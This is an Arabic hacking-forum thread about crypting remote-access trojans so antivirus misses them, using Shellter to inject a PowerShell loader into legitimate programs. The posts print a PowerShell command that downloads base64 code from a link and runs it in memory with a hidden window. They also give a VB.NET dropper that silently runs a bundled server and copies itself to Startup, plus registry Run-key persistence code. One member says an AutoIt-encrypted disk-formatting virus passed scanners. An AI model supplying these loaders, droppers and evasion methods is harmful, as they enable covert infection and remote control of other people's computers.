قنبله التشفير الابدي تعالوا خذوا عيدياتكم ^-^

تم تحميل الصفحة في 1,9171521 ثانية
قنبله التشفير الابدي تعالوا خذوا عيدياتكم ^-^

kasp3r

.:: مشرف اختبار الاختراق ::.
rankrankrankrank
إنضم
15 أغسطس 2017
المشاركات
1,192
الإعجابات
1,020
النقاط
198
+السلام عليكم ورحمه الله
اخواني بالله
"انا بريء من اي فعل يغضب الله"
انا اليوم حبيت لكم تشفير ابدي وذالك يعتمد على اداة shellter :149:
انا ما سويت اشيء ابدااااااااا
بس نشرت طريقه لا اكثر :yaho::yaho::yaho::yaho:
انا انصح الجميع بمشاهده الفيديو الى النهاية :(172)[1]:
تم اختبار
والنتيجه نعناعي 100% + تخطي run time للنود هذا انا يلي جربته :ssse:
وتحكم كامل :s228:
بس في شغله مزعجه وهي انو لازم تنبثق نافذة ال powershell يعني انا ما اقدرت اوجد الها حل :58:
ثانيا
لازم يكون السيرفر خال من النسخ كيف يعني لا يوجد نسخ الى ال startup او انتشار بال usb
الطريقه تضبط على كل انواع الرات بالشروط المذكورة فوق
كود الباورشيل ما اله دخل بالكلين يعني حتى لو انكشف ما اله دخل بالمرة
الكلين يعتمد على البرنامج يلي راح ينحقن بكود ال power shell
لا تيجي بعد يومين وتقلي انكشفت دور على برنامج ثاني واحقنه وراح يرجع كلين :turbopoke:
+
الناتج راح يكون ملف exe انت تقدر تبرمج برنامج بال vb تستطيع ان تضيفله خصائص كثير مثل النسخ الى الستارت اب الرجستري وال temp
انتقال عبر ال usb + تجاوز ال vmware حتى لا يتم فحصه
الخ ................... العب على كيفك :(172)[1]::(172)[1]::(172)[1]:
انا حاولت اني اعمل تثبيت للفايروس الناتج الى ال startup بس كان مكشوف هذا كودي
ركز التثبيت كان مكشوف وليس الفيروس

كود:
Imports Microsoft.Win32

Public Class Form1

    Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
        Me.Hide()
        Me.Visible = False
        Me.Opacity = 0
        Dim dir As String = My.Computer.FileSystem.SpecialDirectories.Temp
        Dim filename As String = dir + "Server.exe"
        IO.File.WriteAllBytes(filename, My.Resources.Server)
        Dim m = New Process
        m.StartInfo.FileName = filename
        m.StartInfo.WindowStyle = ProcessWindowStyle.Hidden
        m.Start()
        Dim startup As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup)
        IO.File.Copy(Application.ExecutablePath, startup & "\osaknficsan.exe")

    End Sub
End Class
اذا حدا قدر يحل مشكلة تبعت الباورشيل ضهوره واختفائه يا ريت ما يبخل
+
قصه الستارت اب
طيب ناتي للشغل هذا الفيديو :

رابط الكود :

كود:
PowerShell.exe -windowstyle hidden -noexit [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String((New-Object System.Net.WebClient).Downloadstring('الرابط'))).EntryPoint.invoke($null,$null)
رابط اداة shellter :

https://www.shellterproject.com/download/

لي هدف من اختصار الروابط ليس المال شيء في نفس يعقوب
يعني ما راح احصل 10 دولار شو بدي فيهم
بس في شيء براسي اظن اكم واحد عرف شو هو :ssse:
شكر خاص ل :
@Hackitup

هو يلي قام بكتابه كود ال powershell
+
اهداء خاص ل :
@๖ۣۜA M E E R
@Bashar Bachir

ولكل شخص قرأ هذه المقاله
 
التعديل الأخير بواسطة المشرف:

Hackitup

Beginner Developer
rank
إنضم
7 يوليو 2016
المشاركات
42
الإعجابات
79
النقاط
18
الإقامة
Powershell
كان لي محاولات مع اخفاء النافذه الظاهره عند حقن الكود بالشلتر.. ولكن ماضبطت اتوقع صعب اخفائها حتى لو شغلت البور شل عن طريق cmd راح تضل النافذه تطلع.

-windowstyle hidden

تعمل فقط minimize

والشلتر لا يدعم حقن ملفات فقط حقن اوامر لذلك لا يمكن استخدام ملف exe or vbs لاخفاء النافذه.

بخصوص التثبيت جربت الرجستري ؟ حسب اخر تجربه لي من فتره, النود ماعنده مشكله في اضافة مفتاح بالرجتسري
يعطيك العافيه كاسبر
 

kasp3r

.:: مشرف اختبار الاختراق ::.
rankrankrankrank
إنضم
15 أغسطس 2017
المشاركات
1,192
الإعجابات
1,020
النقاط
198
كان لي محاولات مع اخفاء النافذه الظاهره عند حقن الكود بالشلتر.. ولكن ماضبطت اتوقع صعب اخفائها حتى لو شغلت البور شل عن طريق cmd راح تضل النافذه تطلع.

-windowstyle hidden

تعمل فقط minimize

والشلتر لا يدعم حقن ملفات فقط حقن اوامر لذلك لا يمكن استخدام ملف exe or vbs لاخفاء النافذه.

بخصوص التثبيت جربت الرجستري ؟ حسب اخر تجربه لي من فتره, النود ماعنده مشكله في اضافة مفتاح بالرجتسري
يعطيك العافيه كاسبر
ولو اخي
الله يعافيك اساسا انا ما سويت اشيء
 

kasp3r

.:: مشرف اختبار الاختراق ::.
rankrankrankrank
إنضم
15 أغسطس 2017
المشاركات
1,192
الإعجابات
1,020
النقاط
198
كان لي محاولات مع اخفاء النافذه الظاهره عند حقن الكود بالشلتر.. ولكن ماضبطت اتوقع صعب اخفائها حتى لو شغلت البور شل عن طريق cmd راح تضل النافذه تطلع.

-windowstyle hidden

تعمل فقط minimize

والشلتر لا يدعم حقن ملفات فقط حقن اوامر لذلك لا يمكن استخدام ملف exe or vbs لاخفاء النافذه.

بخصوص التثبيت جربت الرجستري ؟ حسب اخر تجربه لي من فتره, النود ماعنده مشكله في اضافة مفتاح بالرجتسري
يعطيك العافيه كاسبر
انا جربت هذا الكود:
My.Computer.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue(Application.ProductName, Application.ExecutablePath)
لاكن شكلوا بدو صلاحيات ادمن
ما ادري يعطي تنبيه انو راح يكتب على ال regestry
اذا عندك واحد اعطينا يا اخ العرب :15:
 

kasp3r

.:: مشرف اختبار الاختراق ::.
rankrankrankrank
إنضم
15 أغسطس 2017
المشاركات
1,192
الإعجابات
1,020
النقاط
198
كان لي محاولات مع اخفاء النافذه الظاهره عند حقن الكود بالشلتر.. ولكن ماضبطت اتوقع صعب اخفائها حتى لو شغلت البور شل عن طريق cmd راح تضل النافذه تطلع.

-windowstyle hidden

تعمل فقط minimize

والشلتر لا يدعم حقن ملفات فقط حقن اوامر لذلك لا يمكن استخدام ملف exe or vbs لاخفاء النافذه.

بخصوص التثبيت جربت الرجستري ؟ حسب اخر تجربه لي من فتره, النود ماعنده مشكله في اضافة مفتاح بالرجتسري
يعطيك العافيه كاسبر
بربك شوف شو هاي القصه الطرمه
حطيت هذا الكود المفروض يكون احسن كود صح ولا لا
My.Computer.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue(Application.ProductName, Application.ExecutablePath)
ترا اعملت مشروع فاضي وحطيت فيه button مع msgbox ونتيجه الفحص :
OPSWAT MetaDefender Cloud | Results
شو قصه الافيريا يعني شيء غير منطقي كل الكود هو
كود:
Imports Microsoft.Win32

Public Class Form1

    Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
        My.Computer.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue(Application.ProductName, Application.ExecutablePath)
    End Sub

    Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
        MsgBox("hi")
    End Sub
End Class
كمان شوي اذا كتبت msgbox("hacked")
خلاص فايروس هههههههه لاحول ولا قوة الا بالله
يعني شو اسوي
 

Hackitup

Beginner Developer
rank
إنضم
7 يوليو 2016
المشاركات
42
الإعجابات
79
النقاط
18
الإقامة
Powershell
انا جربت هذا الكود:
My.Computer.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue(Application.ProductName, Application.ExecutablePath)
لاكن شكلوا بدو صلاحيات ادمن
ما ادري يعطي تنبيه انو راح يكتب على ال regestry
اذا عندك واحد اعطينا يا اخ العرب :15:
LocalMachine نعم يحتاج ادمن.

خليك على Current User

وراح تنضاف.

وعلى فكرة تقدر تسويها Powershell

جرب الكود بالاسفل

كود:
reg add 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run' /v Calculator /d C:\Windows\System32\calc.exe
 

kasp3r

.:: مشرف اختبار الاختراق ::.
rankrankrankrank
إنضم
15 أغسطس 2017
المشاركات
1,192
الإعجابات
1,020
النقاط
198
LocalMachine نعم يحتاج ادمن.

خليك على Current User

وراح تنضاف.

وعلى فكرة تقدر تسويها Powershell

جرب الكود بالاسفل

كود:
reg add 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run' /v Calculator /d C:\Windows\System32\calc.exe
مش راح ينفع ايش احنا راح ننسخ صعبه فكر فيها شوي
 

kasp3r

.:: مشرف اختبار الاختراق ::.
rankrankrankrank
إنضم
15 أغسطس 2017
المشاركات
1,192
الإعجابات
1,020
النقاط
198
عيدية جميلة بس أنا ****** في التلغيم والتشفير
ملاحظة : حط أي شي تفكر فيه بدال النجوم ههه
هههههههههههههه
اخي الشرح لاي شخص عمره ما شفر
يعني بسيط جداااااااااااااا
لا برمجه ولا بطيخ ولا حقن بايتات في الرام ولا عكس قيم ولا تخاير السيرفر
يعني جاهزه
 

Hackitup

Beginner Developer
rank
إنضم
7 يوليو 2016
المشاركات
42
الإعجابات
79
النقاط
18
الإقامة
Powershell
مش راح ينفع ايش احنا راح ننسخ صعبه فكر فيها شوي
تبغ الصراحه..

انا ماني فاهم ليه انت اصلا بتثبتها عن طريق فيجول بيسك.

كيف راح تشغل الملف عشان تتم العمليه ؟

وبالبور شل ليه ما ينفع ؟ قصدك عشان صعبه تحصل على Application.ExecutablePath ؟
 

MSCFC

Master DevLoper
rankrankrank
إنضم
12 نوفمبر 2016
المشاركات
785
الإعجابات
999
النقاط
121
الإقامة
D Z
هههههههههههههه
اخي الشرح لاي شخص عمره ما شفر
يعني بسيط جداااااااااااااا
لا برمجه ولا بطيخ ولا حقن بايتات في الرام ولا عكس قيم ولا تخاير السيرفر
يعني جاهزه
بس في نعناع ههههههه
ما أحتاج التشفير يعني شسوي بيه مثلا ؟
 

MSCFC

Master DevLoper
rankrankrank
إنضم
12 نوفمبر 2016
المشاركات
785
الإعجابات
999
النقاط
121
الإقامة
D Z
أيضًا بالنسبة للتشفير
جربت أسوي خلط بين مجموعة دوال وطلعت بالنتيجة الآتية
Key = Cos(Number(Crc32 & MD5)) * FileBinaryContent
لما تطلع المفتاح ذا في لغة AutoIt في دالة إسمها Crypt مدري وش نوع التشفير بس تعطيها مفتاح ونص وتشفرهلك ، المهم بيصير كذا :
CryptedFileContent = Crypt(FileContent, Key)
ومبروك جربت أسوي فايرس خفيف يسوي فورمات للجهاز وبالطبع كشفه الأنتي فايرس
مع هذا التشفير النتيجة كلين في النود وأفاست وأي في جي
تشفير غبي هههه
 
إنضم
10 أغسطس 2012
المشاركات
1,420
الإعجابات
1,146
النقاط
113
الإقامة
IRAQ
شكرا لك اخي كاسبر الحبيب لكن هناك عدة اسئله تطرح نفسها وتتمرغل بالارض

1- هل يمكن دمج هذا الناتج (exe) الملف المحقون مع برنامج حقيقي ويعمل بدون مشكله رغم ضهور هذه النافذه؟؟

2-كيف يمكن التثبيت اذا كان الناتج ملف محقون ؟؟ كيف يمكن اضافه تثبيت له ؟؟

3-انت تقول كلين ابدي والتشفيره تعتمد على على القيم base64 اذا كانت مكشوفه فان برامج الحماية تمسكها عند التشغيل ام انا غلطان؟

 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 1 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل